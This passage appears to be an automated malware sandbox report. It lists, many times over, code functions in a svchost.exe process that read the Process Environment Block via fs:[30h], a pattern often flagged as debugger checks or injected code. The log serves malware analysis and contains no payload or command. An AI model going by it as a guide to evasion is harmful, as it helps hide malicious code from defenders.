                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F60B8 mov ecx, dword ptr fs:[00000030h]4_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B20DE mov eax, dword ptr fs:[00000030h]4_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030380E9 mov eax, dword ptr fs:[00000030h]4_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B60E0 mov eax, dword ptr fs:[00000030h]4_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302C0F0 mov eax, dword ptr fs:[00000030h]4_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030720F0 mov ecx, dword ptr fs:[00000030h]4_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C700 mov eax, dword ptr fs:[00000030h]4_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030710 mov eax, dword ptr fs:[00000030h]4_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03060710 mov eax, dword ptr fs:[00000030h]4_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C720 mov eax, dword ptr fs:[00000030h]4_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C720 mov eax, dword ptr fs:[00000030h]4_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306273C mov eax, dword ptr fs:[00000030h]4_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306273C mov ecx, dword ptr fs:[00000030h]4_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306273C mov eax, dword ptr fs:[00000030h]4_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AC730 mov eax, dword ptr fs:[00000030h]4_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306674D mov esi, dword ptr fs:[00000030h]4_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306674D mov eax, dword ptr fs:[00000030h]4_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306674D mov eax, dword ptr fs:[00000030h]4_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030750 mov eax, dword ptr fs:[00000030h]4_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE75D mov eax, dword ptr fs:[00000030h]4_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072750 mov eax, dword ptr fs:[00000030h]4_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072750 mov eax, dword ptr fs:[00000030h]4_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B4755 mov eax, dword ptr fs:[00000030h]4_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038770 mov eax, dword ptr fs:[00000030h]4_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040770 mov eax, dword ptr fs:[00000030h]4_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D678E mov eax, dword ptr fs:[00000030h]4_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030307AF mov eax, dword ptr fs:[00000030h]4_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E47A0 mov eax, dword ptr fs:[00000030h]4_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303C7C0 mov eax, dword ptr fs:[00000030h]4_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B07C3 mov eax, dword ptr fs:[00000030h]4_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030527ED mov eax, dword ptr fs:[00000030h]4_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030527ED mov eax, dword ptr fs:[00000030h]4_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030527ED mov eax, dword ptr fs:[00000030h]4_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE7E1 mov eax, dword ptr fs:[00000030h]4_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030347FB mov eax, dword ptr fs:[00000030h]4_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030347FB mov eax, dword ptr fs:[00000030h]4_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE609 mov eax, dword ptr fs:[00000030h]4_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304260B mov eax, dword ptr fs:[00000030h]4_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304260B mov eax, dword ptr fs:[00000030h]4_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304260B mov eax, dword ptr fs:[00000030h]4_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304260B mov eax, dword ptr fs:[00000030h]4_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304260B mov eax, dword ptr fs:[00000030h]4_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304260B mov eax, dword ptr fs:[00000030h]4_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304260B mov eax, dword ptr fs:[00000030h]4_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072619 mov eax, dword ptr fs:[00000030h]4_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E627 mov eax, dword ptr fs:[00000030h]4_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03066620 mov eax, dword ptr fs:[00000030h]4_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03068620 mov eax, dword ptr fs:[00000030h]4_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303262C mov eax, dword ptr fs:[00000030h]4_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304C640 mov eax, dword ptr fs:[00000030h]4_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F866E mov eax, dword ptr fs:[00000030h]4_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F866E mov eax, dword ptr fs:[00000030h]4_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A660 mov eax, dword ptr fs:[00000030h]4_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A660 mov eax, dword ptr fs:[00000030h]4_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03062674 mov eax, dword ptr fs:[00000030h]4_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034690 mov eax, dword ptr fs:[00000030h]4_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034690 mov eax, dword ptr fs:[00000030h]4_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C6A6 mov eax, dword ptr fs:[00000030h]4_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030666B0 mov eax, dword ptr fs:[00000030h]4_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A6C7 mov eax, dword ptr fs:[00000030h]4_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h]4_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h]4_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h]4_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE6F2 mov eax, dword ptr fs:[00000030h]4_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B06F1 mov eax, dword ptr fs:[00000030h]4_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B06F1 mov eax, dword ptr fs:[00000030h]4_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6500 mov eax, dword ptr fs:[00000030h]4_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104500 mov eax, dword ptr fs:[00000030h]4_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104500 mov eax, dword ptr fs:[00000030h]4_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104500 mov eax, dword ptr fs:[00000030h]4_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104500 mov eax, dword ptr fs:[00000030h]4_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104500 mov eax, dword ptr fs:[00000030h]4_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104500 mov eax, dword ptr fs:[00000030h]4_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104500 mov eax, dword ptr fs:[00000030h]4_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040535 mov eax, dword ptr fs:[00000030h]4_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040535 mov eax, dword ptr fs:[00000030h]4_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040535 mov eax, dword ptr fs:[00000030h]4_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040535 mov eax, dword ptr fs:[00000030h]4_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040535 mov eax, dword ptr fs:[00000030h]4_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040535 mov eax, dword ptr fs:[00000030h]4_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h]4_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h]4_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h]4_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h]4_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E53E mov eax, dword ptr fs:[00000030h]4_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038550 mov eax, dword ptr fs:[00000030h]4_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038550 mov eax, dword ptr fs:[00000030h]4_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306656A mov eax, dword ptr fs:[00000030h]4_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306656A mov eax, dword ptr fs:[00000030h]4_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306656A mov eax, dword ptr fs:[00000030h]4_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03032582 mov eax, dword ptr fs:[00000030h]4_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03032582 mov ecx, dword ptr fs:[00000030h]4_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064588 mov eax, dword ptr fs:[00000030h]4_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E59C mov eax, dword ptr fs:[00000030h]4_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B05A7 mov eax, dword ptr fs:[00000030h]4_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B05A7 mov eax, dword ptr fs:[00000030h]4_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B05A7 mov eax, dword ptr fs:[00000030h]4_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030545B1 mov eax, dword ptr fs:[00000030h]4_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030545B1 mov eax, dword ptr fs:[00000030h]4_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E5CF mov eax, dword ptr fs:[00000030h]4_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E5CF mov eax, dword ptr fs:[00000030h]4_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030365D0 mov eax, dword ptr fs:[00000030h]4_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A5D0 mov eax, dword ptr fs:[00000030h]4_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A5D0 mov eax, dword ptr fs:[00000030h]4_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E5E7 mov eax, dword ptr fs:[00000030h]4_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030325E0 mov eax, dword ptr fs:[00000030h]4_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C5ED mov eax, dword ptr fs:[00000030h]4_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C5ED mov eax, dword ptr fs:[00000030h]4_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03068402 mov eax, dword ptr fs:[00000030h]4_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03068402 mov eax, dword ptr fs:[00000030h]4_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03068402 mov eax, dword ptr fs:[00000030h]4_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E420 mov eax, dword ptr fs:[00000030h]4_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E420 mov eax, dword ptr fs:[00000030h]4_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E420 mov eax, dword ptr fs:[00000030h]4_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302C427 mov eax, dword ptr fs:[00000030h]4_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h]4_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h]4_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h]4_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h]4_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h]4_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h]4_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B6420 mov eax, dword ptr fs:[00000030h]4_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A430 mov eax, dword ptr fs:[00000030h]4_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E443 mov eax, dword ptr fs:[00000030h]4_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EA456 mov eax, dword ptr fs:[00000030h]4_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302645D mov eax, dword ptr fs:[00000030h]4_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305245A mov eax, dword ptr fs:[00000030h]4_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC460 mov ecx, dword ptr fs:[00000030h]4_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305A470 mov eax, dword ptr fs:[00000030h]4_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305A470 mov eax, dword ptr fs:[00000030h]4_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305A470 mov eax, dword ptr fs:[00000030h]4_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EA49A mov eax, dword ptr fs:[00000030h]4_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030364AB mov eax, dword ptr fs:[00000030h]4_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030644B0 mov ecx, dword ptr fs:[00000030h]4_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BA4B0 mov eax, dword ptr fs:[00000030h]4_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030304E5 mov ecx, dword ptr fs:[00000030h]4_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AEB1D mov eax, dword ptr fs:[00000030h]4_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305EB20 mov eax, dword ptr fs:[00000030h]4_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305EB20 mov eax, dword ptr fs:[00000030h]4_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F8B28 mov eax, dword ptr fs:[00000030h]4_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F8B28 mov eax, dword ptr fs:[00000030h]4_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E4B4B mov eax, dword ptr fs:[00000030h]4_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E4B4B mov eax, dword ptr fs:[00000030h]4_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6B40 mov eax, dword ptr fs:[00000030h]4_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6B40 mov eax, dword ptr fs:[00000030h]4_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FAB40 mov eax, dword ptr fs:[00000030h]4_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D8B42 mov eax, dword ptr fs:[00000030h]4_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DEB50 mov eax, dword ptr fs:[00000030h]4_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302CB7E mov eax, dword ptr fs:[00000030h]4_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040BBE mov eax, dword ptr fs:[00000030h]4_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040BBE mov eax, dword ptr fs:[00000030h]4_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E4BB0 mov eax, dword ptr fs:[00000030h]4_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E4BB0 mov eax, dword ptr fs:[00000030h]4_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03050BCB mov eax, dword ptr fs:[00000030h]4_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03050BCB mov eax, dword ptr fs:[00000030h]4_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03050BCB mov eax, dword ptr fs:[00000030h]4_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030BCD mov eax, dword ptr fs:[00000030h]4_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030BCD mov eax, dword ptr fs:[00000030h]4_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030BCD mov eax, dword ptr fs:[00000030h]4_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DEBD0 mov eax, dword ptr fs:[00000030h]4_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038BF0 mov eax, dword ptr fs:[00000030h]4_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038BF0 mov eax, dword ptr fs:[00000030h]4_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038BF0 mov eax, dword ptr fs:[00000030h]4_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305EBFC mov eax, dword ptr fs:[00000030h]4_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BCBF0 mov eax, dword ptr fs:[00000030h]4_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BCA11 mov eax, dword ptr fs:[00000030h]4_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA24 mov eax, dword ptr fs:[00000030h]4_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305EA2E mov eax, dword ptr fs:[00000030h]4_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03054A35 mov eax, dword ptr fs:[00000030h]4_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03054A35 mov eax, dword ptr fs:[00000030h]4_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA38 mov eax, dword ptr fs:[00000030h]4_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036A50 mov eax, dword ptr fs:[00000030h]4_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040A5B mov eax, dword ptr fs:[00000030h]4_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040A5B mov eax, dword ptr fs:[00000030h]4_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA6F mov eax, dword ptr fs:[00000030h]4_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA6F mov eax, dword ptr fs:[00000030h]4_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CA6F mov eax, dword ptr fs:[00000030h]4_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DEA60 mov eax, dword ptr fs:[00000030h]4_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030ACA72 mov eax, dword ptr fs:[00000030h]4_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030ACA72 mov eax, dword ptr fs:[00000030h]4_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
